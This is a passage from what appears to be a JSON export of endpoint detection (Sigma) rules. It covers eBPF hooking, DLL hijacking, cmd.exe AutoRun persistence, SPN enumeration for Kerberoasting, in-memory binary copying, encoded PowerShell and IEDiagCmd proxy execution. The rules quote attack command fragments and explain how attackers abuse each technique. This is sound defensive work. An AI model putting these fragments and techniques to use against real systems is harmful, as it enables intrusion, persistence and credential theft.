ZABvAHsADQAKAA0ACgAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEADQAKACAAIAAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQQB0AHQAZQBuAHQAZQAiAA0ACgANAAoAfQB1AG4AdABpAGwAKAAoAEcAZQB0AC0AUwBlAHIAdgBpAGMAZQAgAC0AbgBhAG0AZQAgAGsAbwBuAGUAYQApAC4AUwB0AGEAdAB1AHMAIAAtAGUAcQAgACIAUgB1AG4AbgBpAG4AZwAiACkADQAKAA0ACgBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBSAHUAbgBuAGkAbgBnACIADQAKACQAYwBoAGUAbQBpAG4ASwBzAHQAYQB0AHUAcwAgAD0AIAAiACIADQAKAA0ACgBpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwAgACgAeAA4ADYAKQBcAFEAdQBlAHMAdABcAEsAQQBDAEUAXABrAHMAdABhAHQAdQBzAC4AZQB4AGUAIgApAHsADQAKACAAIAAgACAA'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "506a49d4-0c48-4c47-a6bb-9c4dbfec663c",
"rule_name": "PowerShell Base64 Encoded Command Execution",
"rule_description": "Detects the execution of PowerShell launching a base64-encoded command.\nAttackers may encode their PowerShell command to bypass security tools that perform pattern matching on suspicious scripts.\nIt is recommended to check the encoded command for malicious content (for instance by selecting the base64 payload, right clicking and selecting 'Decode base64') and to analyze the execution context of the PowerShell binary.\n",
"rule_creation_date": "2021-04-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1059.001",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5079799a-2949-428b-a9e2-e8eef82f7be0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296611Z",
"creation_date": "2026-03-23T11:45:35.296613Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296618Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf",
"https://redcanary.com/blog/threat-detection/ebpf-malware/",
"https://github.com/pathtofile/bad-bpf",
"https://attack.mitre.org/techniques/T1014/"
],
"name": "t1014_ebpf_hooking.yml",
"content": "title: eBPF Hooking\nid: 5079799a-2949-428b-a9e2-e8eef82f7be0\ndescription: |\n Detects a function hooked via eBPF using either a KProbe or a Tracepoint.\n Malware can abuse kprobes by attaching eBPF programs to sensitive kernel functions so it can observe or alter their behavior whenever those functions are invoked.\n By using kretprobes, it can intercept the return values of system calls and subtly modify them, for example to hide files, processes, or network connections.\n Tracepoints give the malware a stable, predefined set of hook locations—such as syscall entry and exit—allowing it to monitor system activity without relying on fragile function offsets.\n These mechanisms allow malicious code to watch and manipulate system behavior from inside the kernel in a stealthy way.\n It is recommended to check the process which loaded the Extended BPF program and the fonction hooked for suspicious activities.\nreferences:\n - https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf\n - https://redcanary.com/blog/threat-detection/ebpf-malware/\n - https://github.com/pathtofile/bad-bpf\n - https://attack.mitre.org/techniques/T1014/\ndate: 2025/08/11\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1014\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'ebpf_attach'\n Image: '*'\n\n filter_edr_av:\n - Image:\n - '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - '/opt/hurukai-agent/bin/hurukai'\n - '/opt/f-secure/baseguard/services/sensor*'\n - '/o*/ds_agent/netagent/tm_netagent' # TrendMicro\n - '/opt/ds_agent/nuagent/ds_nuagent'\n - '/opt/TrendMicro/vls_agent/vls_am'\n - '/opt/ds_agent/ds_am'\n - '/opt/CrowdStrike/falcon-sensor-*'\n - '/var/ossec/bin/wazuh-syscheckd'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/sentinelone/ebpfs/test_ebpf'\n - '/opt/sentinelone/ebpfs/core/*'\n - 
'/usr/local/qualys/cloud-agent/mux/bpf/bin/qualys-bpf*'\n - '/usr/bin/falco'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - 'memfd:/sophos-subprocess-*-exec?'\n - '/opt/sysmon/sysmon'\n - ProcessParentImage:\n - '/opt/sophos-spl/plugins/runtimedetections/bin/runtimedetections.0'\n - '/opt/fireeye/bin/rte-sensor'\n - ProcessCommandLine:\n - '/opt/hurukai-agent/bin/hurukai --diagnostic'\n - '/usr/bin/python3 /opt/paloaltonetworks/pab/linux_protector.py PrismaAccessBrowser'\n - Image: '/opt/hurukai/hurukai'\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n filter_firewall:\n Image:\n - '/usr/bin/opensnitchd'\n - '/opt/forticlient/webfilter'\n\n filter_monitoring:\n Image:\n - '/OPT/dynatrace*agent/agent/lib64/oneagentebpfdiscovery'\n - '*/dynatrace/agent/lib64/oneagentebpfdiscovery'\n - '/OPT/dynatrace*agent/agent/lib64/oneagentnettracer'\n - '*/usr/libexec/netdata/plugins.d/ebpf.plugin'\n - '/opt/datadog-agent/embedded/bin/system-probe'\n - '/opt/instana/agent/system/com/instana/ebpf*' # IBM\n - '/opt/stackstate-agent/bin/agent/process-agent'\n\n filter_bpfcc:\n ProcessCommandLine|startswith: '/usr/bin/python3 /usr/sbin/*-bpfcc'\n\n filter_bpftrace:\n Image: '/usr/bin/bpftrace'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5079799a-2949-428b-a9e2-e8eef82f7be0",
"rule_name": "eBPF Hooking",
"rule_description": "Detects a function hooked via eBPF using either a KProbe or a Tracepoint.\nMalware can abuse kprobes by attaching eBPF programs to sensitive kernel functions so it can observe or alter their behavior whenever those functions are invoked.\nBy using kretprobes, it can intercept the return values of system calls and subtly modify them, for example to hide files, processes, or network connections.\nTracepoints give the malware a stable, predefined set of hook locations—such as syscall entry and exit—allowing it to monitor system activity without relying on fragile function offsets.\nThese mechanisms allow malicious code to watch and manipulate system behavior from inside the kernel in a stealthy way.\nIt is recommended to check the process which loaded the Extended BPF program and the function hooked for suspicious activities.\n",
"rule_creation_date": "2025-08-11",
"rule_modified_date": "2026-02-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1014"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5090a218-eedf-49da-a5b1-15aa0497e12a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611648Z",
"creation_date": "2026-03-23T11:45:34.611651Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611659Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/",
"https://attack.mitre.org/techniques/T1070/010/"
],
"name": "t1070_010_binary_copied_from_memory.yml",
"content": "title: Binary Copied from Memory\nid: 5090a218-eedf-49da-a5b1-15aa0497e12a\ndescription: |\n Detects the copy of a running process binary from memory to a file.\n Attackers can copy a binary from memory after having deleted it to evade detection.\n It is recommended to investigate the binary that is copied to determine its legitimacy.\nreferences:\n - https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/\n - https://attack.mitre.org/techniques/T1070/010/\ndate: 2024/10/09\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.MemoryExecution\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|re: '^.*(cp|cat) /proc/[0-9]+/exe .*'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5090a218-eedf-49da-a5b1-15aa0497e12a",
"rule_name": "Binary Copied from Memory",
"rule_description": "Detects the copy of a running process binary from memory to a file.\nAttackers can copy a binary from memory after having deleted it to evade detection.\nIt is recommended to investigate the binary that is copied to determine its legitimacy.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-01-08",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "50b47afd-ac3e-416b-8952-d95fdb3a39c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087493Z",
"creation_date": "2026-03-23T11:45:34.087495Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087499Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_camerasettings.yml",
"content": "title: DLL Hijacking via camerasettings.exe\nid: 50b47afd-ac3e-416b-8952-d95fdb3a39c5\ndescription: |\n Detects potential Windows DLL Hijacking via camerasettings.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'camerasettings.exe'\n ImageLoaded|endswith: '\\dui70.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "50b47afd-ac3e-416b-8952-d95fdb3a39c5",
"rule_name": "DLL Hijacking via camerasettings.exe",
"rule_description": "Detects potential Windows DLL Hijacking via camerasettings.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "50c34fde-abe0-424f-8a5b-4d6e76f40681",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627097Z",
"creation_date": "2026-03-23T11:45:34.627099Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627104Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1547_persistence_registry_cmd_autorun.yml",
"content": "title: Cmd.exe Autorun Set\nid: 50c34fde-abe0-424f-8a5b-4d6e76f40681\ndescription: |\n Detects when the cmd.exe AutoRun key is set in the registry.\n The command specified in the registry details is executed each time a cmd.exe process is run on the system.\n Attackers can register a malicious command to persist on the machine after compromising it.\n It is recommended to investigate the content of the registry value to look for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1547/\ndate: 2020/09/28\nmodified: 2026/02/12\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKU\\\\*\\Software\\Microsoft\\Command Processor\\AutoRun'\n - 'HKU\\\\*\\Software\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun'\n - 'HKLM\\Software\\Microsoft\\Command Processor\\AutoRun'\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun'\n filter_empty:\n Details: '(Empty)'\n\n exclusion_miniconda:\n # c:\\programdata\\miniconda3\\python.exe c:\\programdata\\miniconda3\\scripts\\conda-script.py init\n # c:\\users\\xxx\\miniconda3\\python.exe c:\\users\\xxx\\miniconda3\\scripts\\conda-script.py init\n # c:\\miniconda3\\python.exe c:\\miniconda3\\scripts\\conda-script.py init\n ProcessCommandLine|contains|all:\n - 'miniconda3\\python.exe'\n - 'miniconda3\\scripts\\conda-script.py init'\n exclusion_anaconda:\n # c:\\programdata\\anaconda3\\python.exe c:\\programdata\\anaconda3\\scripts\\conda-script.py init\n # c:\\users\\xxx\\anaconda3\\python.exe c:\\users\\xxx\\anaconda3\\scripts\\conda-script.py init\n ProcessCommandLine|contains|all:\n - '\\anaconda3\\python.exe'\n - '\\anaconda3\\scripts\\conda-script.py init'\n\n 
exclusion_various:\n Details|contains:\n - '\\condabin\\conda_hook.bat'\n - '\\condabin\\mamba_hook.bat'\n\n exclusion_image:\n ProcessImage:\n - '?:\\program files (x86)\\clink\\clink_x86.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\WindowsUpdateBox.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "50c34fde-abe0-424f-8a5b-4d6e76f40681",
"rule_name": "Cmd.exe Autorun Set",
"rule_description": "Detects when the cmd.exe AutoRun key is set in the registry.\nThe command specified in the registry details is executed each time a cmd.exe process is run on the system.\nAttackers can register a malicious command to persist on the machine after compromising it.\nIt is recommended to investigate the content of the registry value to look for malicious content.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2026-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "50d0aedb-3837-4993-b38c-dcd4b2e1cfd4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096185Z",
"creation_date": "2026-03-23T11:45:34.096187Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096191Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_appidpolicyconverter.yml",
"content": "title: DLL Hijacking via AppIDPolicyConverter.exe\nid: 50d0aedb-3837-4993-b38c-dcd4b2e1cfd4\ndescription: |\n Detects potential Windows DLL Hijacking via AppIDPolicyConverter.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppIDPolicyConverter.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\msvcp110_win.dll'\n - '\\srpapi.dll'\n - '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "50d0aedb-3837-4993-b38c-dcd4b2e1cfd4",
"rule_name": "DLL Hijacking via AppIDPolicyConverter.exe",
"rule_description": "Detects potential Windows DLL Hijacking via AppIDPolicyConverter.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "50e48bae-efce-45a3-847c-595812fe453c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095151Z",
"creation_date": "2026-03-23T11:45:34.095153Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095157Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11)",
"https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
"https://attack.mitre.org/techniques/T1558/003/"
],
"name": "t1558_003_enumerate_spn_via_powershell.yml",
"content": "title: Suspicious SPNs Enumeration via PowerShell\nid: 50e48bae-efce-45a3-847c-595812fe453c\ndescription: |\n Detects the suspicious enumeration of Service Principal Names (SPNs) via PowerShell.\n SPNs are used to uniquely identify each instance of a Windows service.\n Attackers can extract the SPNs used in Active Directory to conduct attacks such as Kerberoasting.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell to look for malicious content or actions.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11)\n - https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/\n - https://attack.mitre.org/techniques/T1558/003/\ndate: 2022/08/17\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n # https://beta.hackndo.com/service-principal-name-spn/\n # https://www.saotn.org/list-spns-used-active-directory/\n PowershellCommand|contains|all:\n - 'DirectoryServices.DirectorySearcher'\n - '[ADSI]'\n - 'servicePrincipalName=\\*'\n - 'GetDirectoryEntry()'\n - '.servicePrincipalName'\n\n selection_2:\n # https://twitter.com/_wald0/status/1562871258190348289\n PowershellCommand|contains|all:\n - 'New-Object DirectoryServices.DirectorySearcher'\n - '(&(objectcategory=user)(servicePrincipalName=\\*))'\n - 'LDAP://'\n - 'FindAll()'\n\n selection_3:\n # https://github.com/nullbind/Powershellery/blob/master/Stable-ish/Get-SPN/Get-SPN.psm1\n PowershellCommand|contains|all:\n - '$ObjSearcher.SearchDN = New-Object System.DirectoryServices.DirectoryEntry('\n - 'LDAP://$($SearchDN)'\n - 
'$Records = $ObjSearcher.FindAll()'\n - '$_.properties.userprincipalname'\n - '# Get number of SPNs for accounts, parse them, and add them to the data table'\n - 'ServicePrincipalNames (SPN):'\n\n condition: 1 of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "50e48bae-efce-45a3-847c-595812fe453c",
"rule_name": "Suspicious SPNs Enumeration via PowerShell",
"rule_description": "Detects the suspicious enumeration of Service Principal Names (SPNs) via PowerShell.\nSPNs are used to uniquely identify each instance of a Windows service.\nAttackers can extract the SPNs used in Active Directory to conduct attacks such as Kerberoasting.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell to look for malicious content or actions.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "51195556-a3b2-47a1-b067-fefb536cee6d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088564Z",
"creation_date": "2026-03-23T11:45:34.088566Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088570Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Iediagcmd/",
"https://research.checkpoint.com/2025/stealth-falcon-zero-day/",
"https://attack.mitre.org/techniques/T1574/008/"
],
"name": "t1574_008_hijack_execution_flow_iediagcmd.yml",
"content": "title: Proxy Execution via IEDiagCmd.exe\nid: 51195556-a3b2-47a1-b067-fefb536cee6d\ndescription: |\n Detects a binary launched by the legitimate IEDiagCmd.exe utility from a location other than the expected System32 directory.\n IEDiagCmd.exe is a diagnostics utility for Internet Explorer that can be abused to proxy execution of arbitrary payloads.\n When the \"%WINDIR%\" environment variable is modified and IEDiagCmd.exe is executed with the /out parameter, it launches its helper tools (ipconfig.exe, route.exe, netsh.exe and makecab.exe) from the modified path (e.g. \"C:\\test\\system32\\netsh.exe\") instead of the real System32 directory.\n This behavior may indicate abuse of the IEDiagCmd LOLBin technique to execute attacker-controlled binaries through a trusted Windows process, bypassing security controls.\n It is recommended to verify whether the windir environment variable was modified prior to execution, and to examine the launched binary (path, signature and hash) to determine whether this activity was legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Iediagcmd/\n - https://research.checkpoint.com/2025/stealth-falcon-zero-day/\n - https://attack.mitre.org/techniques/T1574/008/\ndate: 2025/06/13\nmodified: 2025/06/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.008\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.IEDiagCmd\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessParentOriginalFileName: 'IEDiagCmd.exe'\n Image|endswith:\n - '\\ipconfig.exe'\n - '\\route.exe'\n - '\\netsh.exe'\n - '\\makecab.exe'\n\n filter_legitimate:\n Image:\n - 